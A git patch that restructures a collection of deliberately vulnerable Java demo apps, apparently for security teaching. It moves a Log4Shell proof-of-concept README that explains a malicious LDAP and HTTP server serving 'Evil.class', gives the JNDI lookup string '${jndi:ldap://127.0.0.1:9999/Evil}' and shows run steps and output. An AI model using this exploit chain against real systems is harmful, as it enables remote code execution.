From 29b3e0299a4e5f86dd5d985ba11fd808c84f27b2 Mon Sep 17 00:00:00 2001
From: Micah Silverman <micah@afitnerd.com>
Date: Thu, 16 Dec 2021 15:24:57 -0500
Subject: [PATCH] broke dependency of child modules on root parent. moved
 Dockerfile into todolist-goof module. Updated todolist poms to reference
 correct versions in dependencies.

---
 README.md                                     | 100 +-----------------
 log4shell-goof/README.md                      |  13 ++-
 .../classes/Server$OperationInterceptor.class | Bin 3159 -> 3141 bytes
 log4shell-goof/pom.xml                        |   6 --
 Dockerfile => todolist-goof/Dockerfile        |   4 +-
 todolist-goof/README.md                       |   2 +-
 todolist-goof/pom.xml                         |   6 --
 todolist-goof/todolist-web-common/pom.xml     |   2 +-
 todolist-goof/todolist-web-struts/pom.xml     |   2 +-
 9 files changed, 18 insertions(+), 117 deletions(-)
 rename Dockerfile => todolist-goof/Dockerfile (66%)

diff --git a/README.md b/README.md
index dc5bb06062..b9e44272f0 100644
--- a/README.md
+++ b/README.md
@@ -1,98 +1,8 @@
-## Log4Shell Proof of Concept
+## Java Goof
 
-The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.
+This is a collection of Java demo apps that are vulnerable in different ways.
 
-This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
-The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.
+It's divided into modules, each one having its own README:
 
-For more information about the exploit and the mechanics of how it works, 
-[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).
-
-### Requirements
-
-You'll need one of the following Java SDKs:
-  * 11.0.1 or earlier
-  * 8u191 or earlier
-  * 7u201 or earlier
-  * 6u211 or earlier
-
-Java SDKs newer than those versions don't have the same vulnerability.
-
-### Building the PoC
-
-In the root folder, run:
-
-```
-./mvnw clean install
-```
-
-**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.
-
-### Running the PoC
-
-This repo has two modules: server and client.
-
-The server module runs a lean LDAP & HTTP server.
-
-The LDAP server listens on port `9999` by default and will return an `LDAPResult` that includes a URL reference to a
-Java class that will be deserialized and executed.
-
-The HTTP server listens on port `8000` and responds to any request with a byte array that is the `Evil.class`.
-
-`Evil` implements `ObjecFactory` which the JNDI mechanism hooks into to execute its `getObjectInstance` method. While
-the method simply returns `null`, it uses `Runtime` to execute arbitrary code on the host machine. In this case, it
-writes to a file called: `/tmp/pwned` to prove that it _could_ execute basically anything available on the machine.
-
-This PoC should run as-is on Linux or Mac.
-
-Open a terminal window and run the following:
-
-```
-cd log4shell-server
-../mvnw exec:java -Dexec.mainClass="Server"
-```
-
-You should see output that looks like the following:
-
-```
-[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-server ---
-LDAP server listening on 0.0.0.0:9999
-HTTP server listening on 0.0.0.0:8000
-```
-
-In another terminal window, run the following:
-
-```
-cd log4shell-client
-JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
-../mvnw exec:java -Dexec.mainClass="Main"
-```
-
-**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
-For example, you can download JDK 8u111 
-[here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html). If you download
-and install the version for Mac, the above command will work for you.
-
-You should see output that looks like the following:
-
-```
-[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-client ---
----------- JVM Props -------------
-java.vm.version=25.111-b14
-java.vm.vendor=Oracle Corporation
-java.vm.name=Java HotSpot(TM) 64-Bit Server VM
-java.vm.specification.name=Java Virtual Machine Specification
-java.vm.specification.vendor=Oracle Corporation
-java.vm.specification.version=1.8
-java.vm.info=mixed mode
----------------------------------
-20:27:49.676 [Main.main()] ERROR Main - test
-/tmp/pwned DOES NOT EXIST
-20:27:49.679 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
-/tmp/pwned EXISTS - yah been pwned!
-```
-
-**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the 
-`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
-client app to work properly. The file not being there and then being present after the attack is how it knows it's
-been successful.
\ No newline at end of file
+* [Todolist Goof](todolist-goof/README.md)
+* [Log4Shell Goof](log4shell-goof/README.md)
diff --git a/log4shell-goof/README.md b/log4shell-goof/README.md
index b08c620530..d5552faabc 100644
--- a/log4shell-goof/README.md
+++ b/log4shell-goof/README.md
@@ -1,7 +1,10 @@
-## Log4Shell Proof of Concept
+## Log4Shell Goof
 
 The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.
 
+This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
+The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.
+
 For more information about the exploit and the mechanics of how it works, 
 [here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).
 
@@ -20,7 +23,7 @@ Java SDKs newer than those versions don't have the same vulnerability.
 In the root folder, run:
 
 ```
-./mvnw clean install
+mvn clean install
 ```
 
 **NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.
@@ -46,7 +49,7 @@ Open a terminal window and run the following:
 
 ```
 cd log4shell-server
-../mvnw exec:java -Dexec.mainClass="Server"
+mvn exec:java -Dexec.mainClass="Server"
 ```
 
 You should see output that looks like the following:
@@ -62,7 +65,7 @@ In another terminal window, run the following:
 ```
 cd log4shell-client
 JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
-../mvnw exec:java -Dexec.mainClass="Main"
+mvn exec:java -Dexec.mainClass="Main"
 ```
 
 **NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
@@ -92,4 +95,4 @@ java.vm.info=mixed mode
 **NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the 
 `/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
 client app to work properly. The file not being there and then being present after the attack is how it knows it's
-been successful.
\ No newline at end of file
+been successful.
diff --git a/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class b/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class
index 7deca812035e69eacfc8eefbf9b290ab816162cc..9eca5167dc2a970503f4a4d250b27b53df737711 100644
GIT binary patch
delta 1422
zcmYLITUQ%Z6#h<<nKKy%NCQC<(h@F(kPt4mrILkhEpmw#Xn}%QX`O}vLm{EbfYcjR
zYqeUnc)VZgb)i1^(5hh}E|)L9_y>Hf{s8|%>pme1*Q_~n_Uvzed+%?b^H=pB)qy|n
z{_-1ugZM^=15OT?0R<|<!-6?F#CJ+nK<!DTQ}z)CXSij;4GnG%-9QNpF{y;se+_s_
zP=<02kAXe#G7M1YfH<TcBS$5C990JHLp4LI*yHw#b+t?72rvZ2MMtnqhaW+ibT5N1
zEKFXh>y)I{KnQi>2gh{+H!w7cI;F<wTTNO^b}EzR*f0Kd)~)GiMwp|;KtxtuF>kJz
z?F(jlu6-BEP`;E+rR_1>OkNnznn{bJmBA=L)0W+Sdh~>jDB29P%PQ45%O166b#&r>
zjspgXbBMw7Kl7MPbaM<mYl(a6KA(oe6xEhoFmpK>)omaS5#$G`ktiONy&VxFys6ZU
zV|a+;xPe~McbRvR-u+_870`6_!Koo3=3Mm@)rUt7oWPLS;N2k&Ba}XrwPsRTD``{e
zkevxh&?yNT6?b??y)?%SoR$q}c4ntU9g}#BW6Hqe*ee2Bs7b>U45hM_URmw1xoBxP
zOQW65WaJ>8G+^Sqh-=*uS^Kzb$1*Sr*={O5W37(NGPuHtmV|Vr49w$#xT5W!)Ua68
zv^O(j9XE4CoM9-*oS&zn3)wVWEKZ2>QX3?)m9^4ILgol5tLitCb|!mC9;jslD|lLb
zuXT}1m&6?{ApUl`Dn_l`@`CNgvv`i<c>^zCjeO(fI#%(bl=>xx=5RuI+zm#{ge1CR
z;1ygI)9%CT|0I4q$%dKecGikB&hS2}IFU|U*+O|%j^isD<d~IRv9b)6!c;2P=oD&n
zGXMs!JoB`3(q6%<w7y1GKY68Jk8FZPqCbP*BFlkmw3ZPTn1%~y;l??<PFB?p8gJk_
zSrmsiiIvgw7Tzv${!S4J`I@6WTPS7NLIuOnHvChqo2VI%L|bEd?E4ma+~s%W(R7PA
zeF&l!^~G-^WxggR^oBK=^B}R+(R%~y#7w-q*_-hW1Z6c)gLm;>fyayY@d3quNJu{%
z_lVZTp>dRPbaMK|IGR-=q6<m^Bmx_S3Qq8iZA7OcKY`0PkC>-z&C{Mohqo(_2R6|Y
zciqO(ZS+lTV!%6?$0M!udWUI|eVoi=ERTtp_l$Qsk8_hdB+0nqS3C`Q%yg+f^(IRF
ziqog&@l;%ic^CYOM8>>n@6ygDTTCsjXlyG8+kxmdR;Qe|@ysSJZ{cMJ<cOp|qU2~n
zpuwH$cV*cq%0e9#Ws$oZ1zAG4ijPPz7u~i~_?SdfXuN~?1fP-$QZyRpT`Y1$NiT-a
d=#NS|)uWNtn`AlgIliE;PQq&{zQoti{{s$F5Xb-k

delta 1428
zcmZ8hNmCm~6#iNoO^-$c2pO@N1YsEi5<=LqalnojzyvS`vlxdYUSu&4VUWl$#@JaD
z;w^TZMeZ!l=Il60RjQ1Wh$2*FsZ=h$<d|drL=HJQc`Z~vq^733-<$Wo@4c_P=lAkI
z%hUJn|M(Mt?f6DV2!n1kV90}EjCgPaqZ~(dxbTEd?lF!hIiAw-G>&l`*Wtkl9VZdf
za7xZ`=^1y!#01Br4j%?JJR|3XhABCpmcz7;86-8NG|cMQ<-)TvkGv;g$ze`|t>KJ@
zc@1Y}B?}zq+&GWtbkyQ`>3M-8&GAy^W|f;k-JM7#>^<TvKNu_-m^H1Kok%5nlD28Z
z%~?BTF&I6`q-k|b$L8kD?|$ZktSASt$ni2Y$Z<jZ!>$XjyV^;8iKx52(m(_k4TRCi
zv1s5DE^}Nl@CvSqZ&`JL{Cv&8<LGACEbg$fg1*lEhYu`BLLwK-jv7+yf`M0Yk?5yl
z^RZ~sw4+Cc`V3shRU$U<8eXUBo8q!818?9>iJIZKVL;$5hO%7RbSya;9k#7Ra<ctQ
zVtU-PM6a?bZQyOZ!{7~A=6J#~<2HQ{*r|Z@ziZ&8<ap1(`?$tXAc1n-_s3>T2IoX7
zW#9vRXy7B<GVn1z$rss?8aLZxa}?uAoth%lTo%Iyi9pFjGGtDemRXvN%OL6Qip5Ff
za|S-eXX1`pDW<sY=lI;f7x+@Pv}E8mzT)^gb3VX2Z)nY#-qOr(y~W=D_b2{xlq=5q
zhEd^R`<x7oQdzNs`Nb6$B-<}C&XTH8hN4-L!ydL{@zWz#Oje>!nl@D?`kX;=$+=DZ
z>f9p!c5W5(N~`!oY4$K^c4}QkQR51TNmpwz15YH!&4qyp2Bp5Ip-0?v)ru~)g}N9K
zg*+tM`OdUDY+CcCg#g`v5M2~TN0^QUt(>%upozvPSzU0@1L&a@uu%91IF`wBpqa)(
ziUp2A!Ev~80$a%{U5~~#>>!Ks&_bw;o}G9!kNFFf4!V6nU3e8Fz$z4mLu+u2HLgJI
z4}}{eS@7G?+ms3=3w@a|{is4UwEXNQ=4R2U2h);sJAu{E+ln@-g<v1B*I^fS6RUxZ
zcno`TI6myfKFZ%ukri<KORx$@J4XjcC&vLWjxLpe=o(N0iNJ=Sf>Zd?8a!j6@8OVd
z7KXPe?Tuzp;493cXa(Lj<t~cX;2T@P246`Q{ziIzr8LMs%CacWq9Wp}^li+d>gYPi
zLv5}Kmp7Qj!!4>`y@i4bm(#CiQQhW>_yQF!85!}__%^LCf_Z9bg(Is~*z7=f4Ygy=
zyV$aVx>eLWAh$>gwCLHJ6R3N=`UkQs<z=Cc^0LTPYfhE`E~AIGOriheAbLqO7j17h
t4x*1#kfIr2_c6n9i1cFUCyz=xX><e}7$D1m!?Y!G>lqqUyog7j{|C?m8ZiI>

diff --git a/log4shell-goof/pom.xml b/log4shell-goof/pom.xml
index e902f400a4..6eb158372a 100644
--- a/log4shell-goof/pom.xml
+++ b/log4shell-goof/pom.xml
@@ -2,12 +2,6 @@
 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
   <modelVersion>4.0.0</modelVersion>
 
-    <parent>
-        <artifactId>java-goof</artifactId>
-        <groupId>io.github.snyk</groupId>
-        <version>1.0-SNAPSHOT</version>
-    </parent>
-
   <groupId>io.snyk</groupId>
   <artifactId>log4shell-poc</artifactId>
   <version>0.0.1-SNAPSHOT</version>
diff --git a/Dockerfile b/todolist-goof/Dockerfile
similarity index 66%
rename from Dockerfile
rename to todolist-goof/Dockerfile
index 1e9063df6e..d37dfaeafa 100644
--- a/Dockerfile
+++ b/todolist-goof/Dockerfile
@@ -8,7 +8,7 @@ RUN --mount=target=$HOME/.m2,type=cache mvn install
 FROM tomcat:8.5.21
 
 RUN mkdir /tmp/extracted_files
-COPY --chown=tomcat:tomcat todolist-goof/web.xml /usr/local/tomcat/conf/web.xml
-COPY --from=build /usr/src/goof/todolist-goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist
+COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
+COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist
 COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii
 COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar
diff --git a/todolist-goof/README.md b/todolist-goof/README.md
index 9e03f33bba..c458877c4d 100644
--- a/todolist-goof/README.md
+++ b/todolist-goof/README.md
@@ -1,4 +1,4 @@
-## Java Goof
+## Todolist Goof
 
 A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc). 
 
diff --git a/todolist-goof/pom.xml b/todolist-goof/pom.xml
index 5753769164..4df79d1b1b 100644
--- a/todolist-goof/pom.xml
+++ b/todolist-goof/pom.xml
@@ -2,12 +2,6 @@
          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
     <modelVersion>4.0.0</modelVersion>
 
-    <parent>
-        <artifactId>java-goof</artifactId>
-        <groupId>io.github.snyk</groupId>
-        <version>0.0.1-SNAPSHOT</version>
-    </parent>
-
     <groupId>io.github.snyk</groupId>
     <artifactId>todolist-mvc</artifactId>
     <version>0.0.1-SNAPSHOT</version>
diff --git a/todolist-goof/todolist-web-common/pom.xml b/todolist-goof/todolist-web-common/pom.xml
index 25f60795b9..59b055ec94 100644
--- a/todolist-goof/todolist-web-common/pom.xml
+++ b/todolist-goof/todolist-web-common/pom.xml
@@ -38,7 +38,7 @@
         <dependency>
             <groupId>io.github.snyk</groupId>
             <artifactId>todolist-core</artifactId>
-            <version>1.0-SNAPSHOT</version>
+            <version>0.0.1-SNAPSHOT</version>
         </dependency>
 
         <!-- javaee web api -->
diff --git a/todolist-goof/todolist-web-struts/pom.xml b/todolist-goof/todolist-web-struts/pom.xml
index 60ea931624..54a356000b 100644
--- a/todolist-goof/todolist-web-struts/pom.xml
+++ b/todolist-goof/todolist-web-struts/pom.xml
@@ -21,7 +21,7 @@
                     <artifactId>javaee-web-api</artifactId>
                 </exclusion>
             </exclusions>
-            <version>1.0-SNAPSHOT</version>
+            <version>0.0.1-SNAPSHOT</version>
         </dependency>
 
         <!-- javaee web api -->